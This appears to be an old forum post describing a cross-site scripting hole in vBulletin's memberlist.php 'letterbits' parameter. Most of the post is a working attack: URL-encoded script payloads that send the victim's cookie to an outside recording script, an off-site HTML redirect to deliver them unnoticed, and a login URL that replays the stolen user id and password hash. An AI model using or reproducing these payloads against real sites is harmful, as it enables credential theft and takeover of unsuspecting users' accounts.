Vbulletin1 Gap

spyshow

Sep 26 2004, 07:55 PM

Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://vulnerable/forum/memberlist....Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%

2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco

rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com.

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]

ADD REPLY / Got an Opinion!	a humble request :-)	RAPID SEARCH!	Free Hosting	[X]
Express your Opinions, Thoughts or Contribute your information that might help someone here. Ask your Doubts & Queries to get answers.. "Together, We enlight each other!"	Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP.		500MB Space No Ads, CPanel, FTP, PHP, MySQL, EMails - 100% FREE